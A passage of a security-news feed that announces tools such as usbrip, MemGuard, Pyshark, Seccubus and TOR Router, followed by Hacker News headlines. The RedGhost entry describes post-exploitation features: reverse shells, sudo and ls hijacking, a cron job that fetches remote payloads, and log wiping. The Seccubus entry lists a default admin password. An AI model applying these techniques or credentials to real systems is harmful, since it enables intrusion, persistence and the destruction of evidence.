Or let the pipenv one-liner do all the dirty work for you:

~/usbrip$ pipenv install && pipenv shell

After that you can run usbrip portably:

(venv) ~/usbrip$ python -m usbrip -h
Or
(venv) ~/usbrip$ python __main__.py -h

Installation

There are two ways to install usbrip into the system: pip or setup.py.

pip or setup.py

First of all, usbrip is pip installable. This means that after git cloning the repo you can simply fire up the pip installation process and after that run usbrip from anywhere in your terminal like so:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install .

(venv) ~/usbrip$ usbrip -h

Or if you want to resolve Python dependencies locally (without bothering PyPI), use setup.py:

~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ python setup.py install

(venv) ~/usbrip$ usbrip -h

alien Note: you'd likely want to run the installation process while the Python virtual environment is active (like it is shown above).

install.sh

Secondly, usbrip can also be installed into the system with the ./installers/install.sh script.

When using the ./installers/install.sh some extra features become available:
  • the virtual environment is created automatically;
  • the storage module becomes available: you can set a crontab job to backup USB events on a schedule (the example of crontab jobs can be found in usbrip/cron/usbrip.cron).

Warning: if you are using the crontab scheduling, you want to configure the cron job with sudo crontab -e in order to force the storage update submodule run as root as well as protect the passwords of the USB event storages. The storage passwords are kept in /var/opt/usbrip/usbrip.ini.

The ./installers/uninstall.sh script removes all the installation artifacts from your system.

To install usbrip use:

~/usbrip$ chmod +x ./installers/install.sh
~/usbrip$ sudo -H ./installers/install.sh [-l/--local] [-s/--storages]
~/usbrip$ cd

~$ usbrip -h

  • When -l switch is enabled, Python dependencies are resolved from local .tar packages (./3rdPartyTools/) instead of PyPI.
  • When -s switch is enabled, not only the usbrip project is installed, but also the list of trusted USB devices, history and violations storages are created.

Note: when using -s option during installation, make sure that system logs do contain at least one external USB device entry. It is a necessary condition for usbrip to successfully create the list of trusted devices (and as a result, successfully create the violations storage).

After the installation completes, feel free to remove the usbrip folder.

Paths

When installed, the usbrip uses the following paths:
  • /opt/usbrip/ — project's main directory;
  • /var/opt/usbrip/usbrip.ini — usbrip configuration file: keeps passwords for 7zip storages;
  • /var/opt/usbrip/storage/ — USB event storages: history.7z and violations.7z (created during the installation process);
  • /var/opt/usbrip/log/ — usbrip logs (recommended to log usbrip activity when using crontab, see usbrip/cron/usbrip.cron);
  • /var/opt/usbrip/trusted/ — list of trusted USB devices (created during the installation process);
  • /usr/local/bin/usbrip — symlink to the /opt/usbrip/venv/bin/usbrip script.

cron

Cron jobs can be set as follows:

~/usbrip$ sudo crontab -l > tmpcron && echo "" >> tmpcron
~/usbrip$ cat usbrip/cron/usbrip.cron | tee -a tmpcron
~/usbrip$ sudo crontab tmpcron
~/usbrip$ rm tmpcron

uninstall.sh

To uninstall usbrip use:

~/usbrip$ chmod +x ./installers/uninstall.sh
~/usbrip$ sudo ./installers/uninstall.sh [-a/--all]

When -a switch is enabled, not only the usbrip project directory is deleted, but also all the storages and usbrip logs are deleted too.

And don't forget to remove the cron job.

Usage

Synopsis

# ---------- BANNER ----------

$ usbrip banner
Get usbrip banner.

# ---------- EVENTS ----------

$ usbrip events history [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB event history.

$ usbrip events open <DUMP.JSON> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Open USB event dump.

$ usbrip events gen_auth <OUT_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Generate a list of trusted (authorized) USB devices.

$ usbrip events violations <IN_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB violation events based on the list of trusted devices.

# ---------- STORAGE ----------

$ usbrip storage list <STORAGE_TYPE> [-q] [--debug]
List contents of the selected storage (7zip archive). STORAGE_TYPE is "history" or "violations".

$ usbrip storage open <STORAGE_TYPE> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-q] [--debug]
Open selected storage (7zip archive). Behaves similary to the EVENTS OPEN submodule.

$ usbrip storage update <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Update storage — add USB events to the existing storage (7zip archive). COMPRESSION_LEVEL is a number in [0..9].

$ usbrip storage create <STORAGE_TYPE> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Create storage — create 7zip archive and add USB events to it according to the selected options.

$ usbrip storage passwd <STORAGE_TYPE> [--lvl <COMPRESSION_LEVEL>] [-q] [--debug]
Change password of the existing storage.

# ---------- IDs ----------

$ usbrip ids search [--vid <VID>] [--pid <PID>] [--offline] [-q] [--debug]
Get extra details about a specific USB device by its <VID> and/or <PID> from the USB ID database.

$ usbrip ids download [-q] [--debug]
Update (download) the USB ID database.

Help

To get a list of module names use:

$ usbrip -h

To get a list of submodule names for a specific module use:

$ usbrip <module> -h

To get a list of all switches for a specific submodule use:

$ usbrip <module> <submodule> -h


Examples

Show the event history of all USB devices, supressing banner output, info messages and user interaction (-q, --quiet), represented as a list (-l, --list) with latest 100 entries (-n NUMBER, --number NUMBER):

$ usbrip events history -ql -n 100

Show the event history of the external USB devices (-e, --external, which were actually disconnected) represented as a table (-t, --table) containing "Connected", "VID", "PID", "Disconnected" and "Serial Number" columns (-c COLUMN [COLUMN], --column COLUMN [COLUMN]) filtered by date (-d DATE [DATE ...], --date DATE [DATE ...]) with logs taken from the outer files (-f FILE [FILE ...], --file FILE [FILE ...]):

$ usbrip events history -et -c conn vid pid disconn serial -d "Dec  9" "Dec 10" -f /var/log/syslog.1 /var/log/syslog.2.gz

Build the event history of all USB devices and redirect the output to a file for further analysis. When the output stream is NOT terminal stdout (| or > for example) there would be no ANSI escape characters (color) in the output so feel free to use it that way. Also notice that usbrip uses some UNICODE symbols so it would be nice to convert the resulting file to UTF-8 encoding (with encov for example) as well as change newline characters to Windows style for portability (with awk for example):

usbrip history events -t | awk '{ sub("$", "\r"); print }' > usbrip.out && enconv -x UTF8 usbrip.out

Remark: you can always get rid of the escape characters by yourself even if you have already got the output to stdout. To do that just copy the output data to usbrip.out and add one more awk instruction:

awk '{ sub("$", "\r"); gsub("\\x1B\\[[0-?]*[ -/]*[@-~]", ""); print }' usbrip.out && enconv -x UTF8 usbrip.out

Generate a list of trusted USB devices as a JSON-file (trusted/auth.json) with "VID" and "PID" attributes containing the first three devices connected on September 26:

$ usbrip events gen_auth trusted/auth.json -a vid pid -n 3 -d "Sep 26"

Search the event history of the external USB devices for violations based on the list of trusted USB devices (trusted/auth.json) by "PID" attribute, restrict resulting events to those which have "Bob" as a user, "EvilUSBManufacturer" as a manufacturer, "1234567890" as a serial number and represent the output as a table with "Connected", "VID" and "PID" columns:

$ usbrip events violations trusted/auth.json -a pid -et --user Bob --manufact EvilUSBManufacturer --serial 1234567890 -c conn vid pid

Search for details about a specific USB device by its VID (--vid VID) and PID (--pid PID):

$ usbrip ids search --vid 0781 --pid 5580

Download the latest version of usb_ids/usb.ids database (the source is here):

$ usbrip ids download

Download USBrip

Article link

Date of publish: Mon, 29 Jul 2019 07:18:00 +0000

MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory



MemGuard- Secure Software Enclave For Storage of Sensitive Information in Memory


This package attempts to reduce the likelihood of sensitive data being exposed. It supports all major operating systems and is written in pure Go.

Features


  • Sensitive data is encrypted and authenticated in memory using xSalsa20 and Poly1305 respectively. The scheme also defends against cold-boot attacks.
  • Memory allocation bypasses the language runtime by using system calls to query the kernel for resources directly. This avoids interference from the garbage-collector.
  • Buffers that store plaintext data are fortified with guard pages and canary values to detect spurious accesses and overflows.
  • Effort is taken to prevent sensitive data from touching the disk. This includes locking memory to prevent swapping and handling core dumps.
  • Kernel-level immutability is implemented so that attempted modification of protected regions results in an access violation.
  • Multiple endpoints provide session purging and safe termination capabilities as well as signal handling to prevent remnant data being left behind.
  • Side-channel attacks are mitigated against by making sure that the copying and comparison of data is done in constant-time.
  • Accidental memory leaks are mitigated against by harnessing the garbage-collector to automatically destroy containers that have become unreachable.

Some features were inspired by libsodium, so credits to them.

Full documentation and a complete overview of the API can be found here. Interesting and useful code samples can be found within the examples subpackage.

Installation

$ go get github.com/awnumar/memguard

We strongly encourage you to pin a specific version for a clean and reliable build. This can be accomplished using modules.

Contributing


  • Using the package and identifying points of friction.
  • Reading the source code and looking for improvements.
  • Adding interesting and useful program samples to ./examples.
  • Developing Proof-of-Concept attacks and mitigations.
  • Improving compatibility with more kernels and architectures.
  • Implementing kernel-specific and cpu-specific protections.
  • Writing useful security and crypto libraries that utilise memguard.
  • Submitting performance improvements or benchmarking code.

Issues are for reporting bugs and for discussion on proposals. Pull requests should be made against master.

Future goals


  • Ability to stream data to and from encrypted enclave objects.
  • Catch segmentation faults to wipe memory before crashing.
  • Evaluate and improve the strategies in place, particularly for Coffer objects.
  • Formalise a threat model and evaluate our performance in regards to it.
  • Use lessons learned to apply patches upstream to the Go language and runtime.

Article link

Date of publish: Sun, 28 Jul 2019 13:14:00 +0000

iKy OSINT Project - To Collect Information From E-Mail With GUI


iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline.


Project iKy is to collects information from an email and shows results in a nice visual interface.

Installation


Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis

wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

And turn on the server in a terminal

redis-server

Python stuff and Celery

You must install the libraries inside requirements.txt
pip install -r requirements.txt

And turn on Celery in another terminal, within the directory backend
./celery.sh

Finally, again, in another terminal turn on backend app from directory backend

python app.py

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the directory frontend install the dependencies

npm install

Turn on Frontend Server

Finally, to run frontend server, execute:

npm start

Browser

Open the browser in this url

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded

Video Demo

Article link

Date of publish: Mon, 22 Jul 2019 08:22:00 +0000

RedGhost - Linux Post Exploitation Framework

RedGhost -  Linux Post Exploitation Framework

RedGhost- Linux post exploitation framework 


It has designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace. 


  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl

  • SudoInject
Function to inject sudo command with wrapper function to run a reverse root shell everytime "sudo" is run for privilege escalataion

  • lsInject
Function to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistence

  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence

  • GetRoot
Function to try various methods to escalate privileges

  • Clearlogs
Function to clear logs and make investigation with forensics difficult

  • MassInfoGrab
Function to grab mass reconaissance/information on system

  • CheckVM
Function to check if the system is a virtual machine

  • MemoryExec
Function to execute remote bash script in memory

  • BanIp
Function to BanIp using iptables

Installation

Install RedGhost in one line code:

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh

One line code to Install prerequisites and RedGhost :

wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-g

Download Redghost

Article link

Date of publish: Fri, 19 Jul 2019 08:30:00 +0000

Pyshark- To Allowing Python Packet Parsing Using Wireshark Dissectors


Python wrapper for tshark, allowing python packet parsing using Wireshark dissectors.


Pyshark features a few "Capture" objects (Live, Remote, File, InMem). Each of those files read from their respective source and then can be used as an iterator to get their packets. Each capture object can also receive various filters so that only some of the incoming packets will be saved.

Installation

All Platforms

Simply run the following to install the latest from pypi

pip install pyshark

Or install from the git repository:

git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install

Mac OS X

You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:

xcode-select --install
pip install libxml

You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.

Usage

Reading from a capture file:

>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
<FileCapture /tmp/mycapture.cap (589 packets)>
>>> print cap[0]
Packet (Length: 698)
Layer ETH:
        Destination: BLANKED
        Source: BLANKED
        Type: IP (0x0800)
Layer IP:
        Version: 4
        Header Length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
        Total Length: 684
        Identification: 0x254f (9551)
        Flags: 0x00
        Fragment offset: 0
        Time to live: 1
        Protocol: UDP (17)
        Header checksum: 0xe148 [correct]
        Source: BLANKED
        Destination: BLANKED
  ...

Other options

  • param keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
  • param input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
  • param display_filter: A display (wireshark) filter to apply on the cap before reading it.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK.
  • param tshark_path: Path of the tshark binary.

Reading from a live interface:

>>> capture = pyshark.LiveCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live interface using a ring buffer

>>> capture = pyshark.LiveRingCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
    print 'Just arrived:', packet

Other options
  • param ring_file_size: Size of the ring file in kB, default is 1024
  • param num_ring_files: Number of ring files to keep, default is 1
  • param ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live remote interface:

>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')
>>> capture.sniff(timeout=50)
>>> capture

Other options
  • param remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
  • param remote_interface: The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
  • param remote_port: The remote port the rpcapd service is listening on
  • param bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary

Accessing packet data:

Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field.

All of the following work:

>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100

To test whether a layer is in a packet, you can use its name:

>>> 'IP' in packet
True

To see all possible field names, use the packet.layer.field_names attribute (i.e. packet.ip.field_names) or the autocomplete function on your interpreter.

You can also get the original binary data of a field, or a pretty description of it:

>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'

Decrypting packet captures

Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).

>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')

A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.

>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')

Python2 deprecation - 

This package no longer supports Python2. If you wish to still use it in Python2, you can:

Use version 0.3.8

  • Install pyshark-legacy via pypi
  • Clone the pyshark-legacy [repo (https://github.com/KimiNewt/pyshark-legacy)], where bugfixes will be applied.


Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.

There are quite a few python packet parsing modules, this one is different because it doesn't actually parse any packets, it simply uses tshark's (wireshark command-line utility) ability to export XMLs to use its parsing.

This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux.

Download Pyshark

Article link

Date of publish: Tue, 16 Jul 2019 14:19:00 +0000

Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time - eBook


"Learn Ethical Hacking from Scratch ($23 Value) FREE For a Limited Time"


Learn how to hack systems like black hat hackers and secure them like security experts.

This eBook will help you:

  • Understand ethical hacking and the different fields and types of hackers
  • Set up a penetration testing lab to practice safe and legal hacking
  • Explore Linux basics, commands, and how to interact with the terminal
  • Access password-protected networks and spy on connected clients
  • Use server and client-side attacks to hack and control remote computers
  • Control a hacked system remotely and use it to hack other systems
  • Discover, exploit, and prevent a number of web application vulnerabilities such as XSS and SQL injections
  • Understand how computer systems work and their vulnerabilities, exploit weaknesses and hack into machines to test their security, and learn how to secure systems from hackers now!

Free offer expires 07/23/19.

Offered Free by: Packt

 DOWNLOAD NOW!
DOWNLOAD NOW

Article link

Date of publish: Wed, 10 Jul 2019 19:28:00 +0000

Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis


Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.

Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.

On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.

Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.

Seccubus V2 works with the following scanners:
  • Nessus
  • OpenVAS
  • Skipfish
  • Medusa (local and remote)
  • Nikto (local and remote)
  • NMap (local and remote)
  • OWASP-ZAP (local and remote)
  • SSLyze
  • Medusa
  • Qualys SSL labs
  • testssl.sh (local and remote)

Docker

Available images.

         Image name                                   Purpose                         
  • seccubus                     Run a full Seccubus stack in a single container
  • seccubus-front            Serving just the front end HTML, javascript and css
  • seccubus-web             Serving front and code and API simultaniously
  • seccubus-api               Serving just the API.
  • seccubus-perl              Running command line scripts, e.g. to scan
  • seccubus-cron             Running cron deamon to execute scans


Information about the docker containers is here

Default password, changing it.

After installation the default username and password for seccubus is:

admin / GiveMeVulns!

It is highly recommended you change this after installation.

/bin/seccubus_passwd -u admin

Download Seccubus

Article link

Date of publish: Fri, 21 Jun 2019 14:05:00 +0000

TOR Router- To Use As Transparent Proxy And Send Traffic Under TOR


TOR Router- A tool that allow you to make TOR your default gateway and send all internet connections under TOR (as transparent proxy) for increase privacy/anonymity without extra unnecessary code.

Tor Router allow you to use TOR as a transparent proxy and send all your traffic under TOR INCLUDING DNS REQUESTS, the only that you need is: a system using systemd (if you want to use the service) and tor.

TOR router doesn't touch system files as the rest of tools for routing your taffic does and the reason is: there isn't needed to move files for routing traffic, also moving files is a bad idea since that a fail in the script/tool can break your system connection without you knowing what has happened.

Script to install on distros using SystemD only

If you are using BlackArch Linux (https://blackarch.org) you can install the script from the repos using the following command:

# pacman -S tor-router

To install from source:

Note that you need BASH, not sh

~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd ./tor-router && sudo bash install.sh

Usage

In distros using systemd, you should consideer using the install.sh script, anyways the process to install/configure tor-router is described here.

It script require root privileges

1. Open a terminal and clone the script using the following command:
~$ git clone https://gitub.com/edu4rdshl/tor-router.git && cd tor-router/files

2. Put the following lines at the end of /etc/tor/torrc
# Seting up TOR transparent proxy for tor-router
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353

3. Restart the tor service
4. Execute the tor-router script as root
# sudo ./tor-router

5. Now all your traffic is under TOR, you can check that in the following pages: https://check.torproject.org and for DNS tests: https://dnsleaktest.com

6. In order to automate the process of the script, you should add it to the SYSTEM autostart scripts according that the init that you are using, for systemd we have a .service file in the files folder.

Uninstalling/Stoping

Delete the tor-router configuration lines in /etc/tor/torrc, disable the tor-router.service using systemctl (if you used the install.sh script), remove /usr/bin/tor-router, /etc/systemd/system/tor-router.service and restart your computer.

Proof of concept

After of run the script, follow the next steps to ensure that all is working as expected:

IP hidden and TOR network configured: 
Visit https://check.torproject.org, you should see a message like it:


Checking DNS Leaks: 

Visit https://dnsleaktest.com and make a extended test to see what are your DNS. You shloud get some like it:


Distros using the script

BlackArch Linux: https://github.com/BlackArch/blackarch/blob/master/packages/tor-router

Download TOR Router

Article link

Date of publish: Wed, 12 Jun 2019 11:00:00 +0000

Hacker News: Front Page

250MWh 'Sand Battery' to start construction in Finland
FileZilla Pro "Perpetual License" – A Warning to All Users

Article URL: https://github.com/x011/FileZilla-Pro-Download

Comments URL: https://news.ycombinator.com/item?id=46073279

Points: 64

# Comments: 26

Article link

Date of publish: Thu, 27 Nov 2025 21:13:39 +0000

Underrated reasons to be thankful V

Article URL: https://dynomight.net/thanks-5/

Comments URL: https://news.ycombinator.com/item?id=46073033

Points: 75

# Comments: 36

Article link

Date of publish: Thu, 27 Nov 2025 20:37:51 +0000

LinkedIn is loud, and corporate is hell

Article URL: https://ramones.dev/posts/linkedin-is-loud/

Comments URL: https://news.ycombinator.com/item?id=46072988

Points: 95

# Comments: 52

Article link

Date of publish: Thu, 27 Nov 2025 20:30:21 +0000

DeepSeekMath-V2: Towards Self-Verifiable Mathematical Reasoning [pdf]

Article URL: https://github.com/deepseek-ai/DeepSeek-Math-V2/blob/main/DeepSeekMath_V2.pdf

Comments URL: https://news.ycombinator.com/item?id=46072786

Points: 72

# Comments: 16

Article link

Date of publish: Thu, 27 Nov 2025 20:03:25 +0000

Internet Handle

Article URL: https://internethandle.org/

Comments URL: https://news.ycombinator.com/item?id=46072296

Points: 11

# Comments: 1

Article link

Date of publish: Thu, 27 Nov 2025 19:07:29 +0000

The input stack on Linux: An end-to-end architecture overview

Article URL: https://venam.net/blog/unix/2025/11/27/input_devices_linux.html

Comments URL: https://news.ycombinator.com/item?id=46071030

Points: 93

# Comments: 6

Article link

Date of publish: Thu, 27 Nov 2025 16:55:30 +0000

Pakistan says rooftop solar output to exceed grid demand in some hubs next year
The VanDersarl Blériot: a 1911 airplane homebuilt by teenage brothers (2017)

Article URL: https://www.historynet.com/vandersarl-bleriot/

Comments URL: https://news.ycombinator.com/item?id=46070868

Points: 35

# Comments: 28

Article link

Date of publish: Thu, 27 Nov 2025 16:38:35 +0000

Same-day upstream Linux support for Snapdragon 8 Elite Gen 5
GitLab discovers widespread NPM supply chain attack

Article URL: https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/

Comments URL: https://news.ycombinator.com/item?id=46070203

Points: 25

# Comments: 4

Article link

Date of publish: Thu, 27 Nov 2025 15:36:56 +0000

Show HN: Runprompt – run .prompt files from the command line

I built a single-file Python script that lets you run LLM prompts from the command line with templating, structured outputs, and the ability to chain prompts together.

When I discovered Google's Dotprompt format (frontmatter + Handlebars templates), I realized it was perfect for something I'd been wanting: treating prompts as first-class programs you can pipe together Unix-style. Google uses Dotprompt in Firebase Genkit and I wanted something simpler - just run a .prompt file directly on the command line.

Here's what it looks like:

--- model: anthropic/claude-sonnet-4-20250514 output: format: json schema: sentiment: string, positive/negative/neutral confidence: number, 0-1 score --- Analyze the sentiment of: {{STDIN}}

Running it:

cat reviews.txt | ./runprompt sentiment.prompt | jq '.sentiment'

The things I think are interesting:

* Structured output schemas: Define JSON schemas in the frontmatter using a simple `field: type, description` syntax. The LLM reliably returns valid JSON you can pipe to other tools.

* Prompt chaining: Pipe JSON output from one prompt as template variables into the next. This makes it easy to build multi-step agentic workflows as simple shell pipelines.

* Zero dependencies: It's a single Python file that uses only stdlib. Just curl it down and run it.

* Provider agnostic: Works with Anthropic, OpenAI, Google AI, and OpenRouter (which gives you access to dozens of models through one API key).

You can use it to automate things like extracting structured data from unstructured text, generating reports from logs, and building small agentic workflows without spinning up a whole framework.

Would love your feedback, and PRs are most welcome!


Comments URL: https://news.ycombinator.com/item?id=46069556

Points: 96

# Comments: 29

Article link

Date of publish: Thu, 27 Nov 2025 14:26:35 +0000

TPUs vs. GPUs and why Google is positioned to win AI race in the long term

Article URL: https://www.uncoveralpha.com/p/the-chip-made-for-the-ai-inference

Comments URL: https://news.ycombinator.com/item?id=46069048

Points: 213

# Comments: 178

Article link

Date of publish: Thu, 27 Nov 2025 13:28:34 +0000

The current state of the theory that GPL propagates to AI models

Article URL: https://shujisado.org/2025/11/27/gpl-propagates-to-ai-models-trained-on-gpl-code/

Comments URL: https://news.ycombinator.com/item?id=46068777

Points: 166

# Comments: 201

Article link

Date of publish: Thu, 27 Nov 2025 12:48:12 +0000

Ray Marching Soft Shadows in 2D (2020)

Article URL: https://www.rykap.com/2020/09/23/distance-fields/

Comments URL: https://news.ycombinator.com/item?id=46066695

Points: 169

# Comments: 28

Article link

Date of publish: Thu, 27 Nov 2025 07:31:24 +0000

Mixpanel Security Breach

Article URL: https://mixpanel.com/blog/sms-security-incident/

Comments URL: https://news.ycombinator.com/item?id=46066522

Points: 191

# Comments: 103

Article link

Date of publish: Thu, 27 Nov 2025 07:02:40 +0000

Linux Kernel Explorer

Article URL: https://reverser.dev/linux-kernel-explorer

Comments URL: https://news.ycombinator.com/item?id=46066280

Points: 512

# Comments: 74

Article link

Date of publish: Thu, 27 Nov 2025 06:17:37 +0000

Tell HN: Happy Thanksgiving

